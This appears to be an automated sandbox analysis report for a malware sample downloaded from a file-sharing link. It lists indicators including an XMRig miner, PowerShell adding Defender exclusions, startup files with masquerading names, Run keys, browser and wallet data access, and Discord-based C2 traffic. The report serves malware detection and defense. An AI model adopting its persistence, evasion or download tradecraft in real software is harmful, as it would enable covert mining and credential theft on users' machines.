Analysis
-
max time kernel
590s -
max time network
600s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
22-05-2024 23:52
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://gofile.io/d/xuEKgb
Resource
win10-20240404-en
General
-
Target
https://gofile.io/d/xuEKgb
Malware Config
Signatures
-
XMRig Miner payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/1736-341-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1736-339-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1736-342-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1736-344-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1736-343-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1736-338-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1736-345-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 992 powershell.exe 4508 powershell.exe 5400 powershell.exe 3796 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops startup file 4 IoCs
Processes:
System32.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe System32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Spotify Update.exe System32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Processer 2021.exe System32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe System32.exe -
Executes dropped EXE 24 IoCs
Processes:
SilverBulletV1.4.EXEnyrox.EXEnyrox.EXEnum3.EXEnum2.EXEjhi_service.exeMicrosoftEdgeUpdater.exekanilzbpgdul.exefdjrmaypnxal.exenum1.EXEsvchost.exeSystem32.exeSilverBulletV1.4.EXEnyrox.EXEnyrox.EXEnum3.EXEnum2.EXEjhi_service.exeMicrosoftEdgeUpdater.exekanilzbpgdul.exenum1.EXEfdjrmaypnxal.exesvchost.exesvchost.exepid process 4220 SilverBulletV1.4.EXE 3000 nyrox.EXE 2584 nyrox.EXE 3512 num3.EXE 2528 num2.EXE 1808 jhi_service.exe 4824 MicrosoftEdgeUpdater.exe 3868 kanilzbpgdul.exe 6136 fdjrmaypnxal.exe 3120 num1.EXE 4076 svchost.exe 5156 System32.exe 4668 SilverBulletV1.4.EXE 5928 nyrox.EXE 4792 nyrox.EXE 3156 num3.EXE 4392 num2.EXE 3020 jhi_service.exe 2060 MicrosoftEdgeUpdater.exe 4272 kanilzbpgdul.exe 1592 num1.EXE 656 fdjrmaypnxal.exe 512 svchost.exe 912 svchost.exe -
Loads dropped DLL 64 IoCs
Processes:
nyrox.EXESystem32.exeSystem32.exenyrox.EXEpid process 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 2584 nyrox.EXE 3460 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 5156 System32.exe 4792 nyrox.EXE 4792 nyrox.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/1736-334-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-335-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-337-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-341-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-339-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-342-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-344-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-343-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-338-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-336-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-333-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1736-345-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/912-2713-0x00007FFB0BF90000-0x00007FFB0C655000-memory.dmp upx behavioral1/memory/912-2799-0x00007FFB29410000-0x00007FFB2941F000-memory.dmp upx behavioral1/memory/912-2798-0x00007FFB234C0000-0x00007FFB234E5000-memory.dmp upx behavioral1/memory/912-2800-0x00007FFB22FF0000-0x00007FFB2300A000-memory.dmp upx behavioral1/memory/912-2801-0x00007FFB21600000-0x00007FFB2162D000-memory.dmp upx behavioral1/memory/912-2808-0x00007FFB28300000-0x00007FFB2830D000-memory.dmp upx behavioral1/memory/912-2825-0x00007FFB27140000-0x00007FFB2714D000-memory.dmp upx behavioral1/memory/912-2824-0x00007FFB22380000-0x00007FFB22399000-memory.dmp upx behavioral1/memory/912-2826-0x00007FFB270B0000-0x00007FFB270BD000-memory.dmp upx behavioral1/memory/912-2823-0x00007FFB1C0F0000-0x00007FFB1C125000-memory.dmp upx behavioral1/memory/912-2828-0x00007FFB215E0000-0x00007FFB215F4000-memory.dmp upx behavioral1/memory/912-2829-0x00007FFAFA4D0000-0x00007FFAFA9F9000-memory.dmp upx behavioral1/memory/912-2830-0x00007FFB15170000-0x00007FFB151A3000-memory.dmp upx behavioral1/memory/912-2831-0x00007FFB0CC90000-0x00007FFB0CD5D000-memory.dmp upx behavioral1/memory/912-2848-0x00007FFB12630000-0x00007FFB12646000-memory.dmp upx behavioral1/memory/912-2849-0x00007FFB12610000-0x00007FFB12622000-memory.dmp upx behavioral1/memory/912-2847-0x00007FFB0BF90000-0x00007FFB0C655000-memory.dmp upx behavioral1/memory/912-2851-0x00007FFB234C0000-0x00007FFB234E5000-memory.dmp upx behavioral1/memory/912-2857-0x00007FFB29540000-0x00007FFB2954B000-memory.dmp upx behavioral1/memory/912-2856-0x00007FFB230D0000-0x00007FFB23157000-memory.dmp upx behavioral1/memory/912-2864-0x00007FFB29460000-0x00007FFB29487000-memory.dmp upx behavioral1/memory/912-2865-0x00007FFB28300000-0x00007FFB2830D000-memory.dmp upx behavioral1/memory/912-2866-0x00007FFB11870000-0x00007FFB1198B000-memory.dmp upx behavioral1/memory/912-2896-0x00007FFB23C40000-0x00007FFB23C64000-memory.dmp upx behavioral1/memory/912-2895-0x00007FFB29430000-0x00007FFB29448000-memory.dmp upx behavioral1/memory/912-2920-0x00007FFB28340000-0x00007FFB2834B000-memory.dmp upx behavioral1/memory/912-2919-0x00007FFB23E40000-0x00007FFB23E4B000-memory.dmp upx behavioral1/memory/912-2935-0x00007FFB23030000-0x00007FFB2303B000-memory.dmp upx behavioral1/memory/912-2934-0x00007FFB23050000-0x00007FFB2305E000-memory.dmp upx behavioral1/memory/912-2933-0x00007FFB23040000-0x00007FFB2304C000-memory.dmp upx behavioral1/memory/912-2932-0x00007FFB23060000-0x00007FFB2306C000-memory.dmp upx behavioral1/memory/912-2931-0x00007FFB23070000-0x00007FFB2307C000-memory.dmp upx behavioral1/memory/912-2930-0x00007FFB231A0000-0x00007FFB231AB000-memory.dmp upx behavioral1/memory/912-2929-0x00007FFB235E0000-0x00007FFB235EC000-memory.dmp upx behavioral1/memory/912-2943-0x00007FFB29460000-0x00007FFB29487000-memory.dmp upx behavioral1/memory/912-2945-0x00007FFB22F80000-0x00007FFB22F8C000-memory.dmp upx behavioral1/memory/912-2944-0x00007FFB22F90000-0x00007FFB22FA2000-memory.dmp upx behavioral1/memory/912-3021-0x00007FFB114A0000-0x00007FFB116E5000-memory.dmp upx behavioral1/memory/912-3020-0x00007FFB29490000-0x00007FFB294BE000-memory.dmp upx behavioral1/memory/912-3019-0x00007FFB294C0000-0x00007FFB294E9000-memory.dmp upx behavioral1/memory/912-2942-0x00007FFB22FB0000-0x00007FFB22FBD000-memory.dmp upx behavioral1/memory/912-2941-0x00007FFB22FC0000-0x00007FFB22FCC000-memory.dmp upx behavioral1/memory/912-2940-0x00007FFB23010000-0x00007FFB2301C000-memory.dmp upx behavioral1/memory/912-2939-0x00007FFB23020000-0x00007FFB2302B000-memory.dmp upx behavioral1/memory/912-2928-0x00007FFB0CC90000-0x00007FFB0CD5D000-memory.dmp upx behavioral1/memory/912-2927-0x00007FFB15170000-0x00007FFB151A3000-memory.dmp upx behavioral1/memory/912-2918-0x00007FFB28330000-0x00007FFB2833C000-memory.dmp upx behavioral1/memory/912-2917-0x00007FFB29420000-0x00007FFB2942B000-memory.dmp upx behavioral1/memory/912-2916-0x00007FFAFA4D0000-0x00007FFAFA9F9000-memory.dmp upx behavioral1/memory/912-2915-0x00007FFB215E0000-0x00007FFB215F4000-memory.dmp upx behavioral1/memory/912-2899-0x00007FFB116F0000-0x00007FFB1186E000-memory.dmp upx behavioral1/memory/912-3082-0x00007FFB111C0000-0x00007FFB114A0000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
SilverBulletV1.4.EXEnum3.EXEnum2.EXEnum1.EXESilverBulletV1.4.EXEnum3.EXEnum2.EXEnum1.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" SilverBulletV1.4.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" num3.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" num2.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" num1.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" SilverBulletV1.4.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" num3.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" num2.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" num1.EXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 30 IoCs
Processes:
flow ioc 93 discord.com 131 discord.com 144 discord.com 89 discord.com 139 discord.com 143 discord.com 90 discord.com 129 discord.com 132 discord.com 134 discord.com 142 discord.com 87 discord.com 91 discord.com 140 discord.com 216 discord.com 209 raw.githubusercontent.com 210 raw.githubusercontent.com 217 discord.com 130 discord.com 135 discord.com 137 discord.com 138 discord.com 141 discord.com 88 discord.com 94 discord.com 95 discord.com 136 discord.com 92 discord.com 133 discord.com 218 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 78 api.ipify.org 79 api.ipify.org -
Drops file in System32 directory 5 IoCs
Processes:
MicrosoftEdgeUpdater.exepowershell.exefdjrmaypnxal.exeMicrosoftEdgeUpdater.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe MicrosoftEdgeUpdater.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe fdjrmaypnxal.exe File opened for modification C:\Windows\system32\MRT.exe MicrosoftEdgeUpdater.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
kanilzbpgdul.exeMicrosoftEdgeUpdater.exefdjrmaypnxal.exeMicrosoftEdgeUpdater.exedescription pid process target process PID 3868 set thread context of 4908 3868 kanilzbpgdul.exe conhost.exe PID 3868 set thread context of 1736 3868 kanilzbpgdul.exe svchost.exe PID 4824 set thread context of 3036 4824 MicrosoftEdgeUpdater.exe dialer.exe PID 6136 set thread context of 6092 6136 fdjrmaypnxal.exe dialer.exe PID 6136 set thread context of 6112 6136 fdjrmaypnxal.exe dialer.exe PID 6136 set thread context of 4012 6136 fdjrmaypnxal.exe dialer.exe PID 2060 set thread context of 1976 2060 MicrosoftEdgeUpdater.exe dialer.exe -
Launches sc.exe 32 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 6056 sc.exe 4024 sc.exe 4640 sc.exe 4304 sc.exe 4536 sc.exe 5460 sc.exe 5424 sc.exe 3020 sc.exe 2612 sc.exe 3844 sc.exe 6064 sc.exe 2840 sc.exe 4728 sc.exe 4212 sc.exe 2372 sc.exe 3136 sc.exe 4556 sc.exe 2444 sc.exe 3336 sc.exe 3148 sc.exe 5940 sc.exe 5700 sc.exe 4544 sc.exe 4792 sc.exe 5276 sc.exe 1080 sc.exe 6020 sc.exe 5332 sc.exe 4948 sc.exe 2324 sc.exe 6032 sc.exe 820 sc.exe -
Detects Pyinstaller 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE pyinstaller C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe pyinstaller -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeOfficeClickToRun.exepowershell.exelsass.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs lsass.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs lsass.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates lsass.exe -
Modifies registry class 64 IoCs
Processes:
chrome.exechrome.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\NodeSlot = "6" chrome.exe Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" 